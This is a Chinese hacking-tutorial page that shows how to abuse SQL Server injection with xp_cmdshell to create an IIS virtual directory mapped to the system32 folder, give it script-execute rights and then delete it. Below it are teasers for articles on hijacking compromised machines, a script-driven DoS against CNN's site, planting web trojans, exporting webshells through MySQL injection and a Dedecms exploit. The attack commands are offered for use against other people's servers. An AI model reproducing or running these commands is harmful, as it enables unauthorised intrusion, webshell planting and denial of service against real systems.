sql server注入建立虚拟目录的方法
所属分类:
实用技巧 / 安全教程
阅读数:
1702
收藏 0赞 0分享
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://xxx.com/win
403错误,表示虚拟目录建好了。。。
在肉鸡上架设全能服务器的方法介绍
肉鸡上架设服务器当看见别人有自己网站的时候,你是不是也很想有一个自己的WEB站点呢?可是建站需要空间,象偶这样的穷人都没钱买空间,只有自己动手,正所谓自己动手丰衣足食,别忘了,DIY永远是黑客的精神!
收藏 0赞 0分享
让侮辱中国人的法国cnn网站完蛋
让侮辱中国人的法国cnn网站完蛋!!!只要你帮助打开一个网页!!
如何DOS攻击CNN网站? ?将这些文字复制,并保存成一个html文件,然后在浏览器中打开,按提示启用脚本,然后,每隔3秒钟将自动连接一次cnn网站(注意,是自动的,只要你不关闭浏览器窗口就可以了,也不会影响你
收藏 0赞 0分享
最新的无权限挂马方式
我写这文章并不是教大家怎么跑去挂马啊,挂马是不对的!不过有的时候真的很想做些让人觉得痛快的事情,因为我就碰到很多的管理员,你跟他说服务器有问题吧!他不信,你改些东西警告他吧,他比你还勤快,你一改他马上覆盖回去,让人真的很郁闷。
收藏 0赞 0分享
不用xp_cmdshell照样执行命令
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
主要是由于Jet允许调用VBA的shell()函
收藏 0赞 0分享
MySQL注入中导出字段内容的研究通过注入导出WebShell
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0赞 0分享
Dedecms getip()的漏洞利用代码
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0赞 0分享
查看更多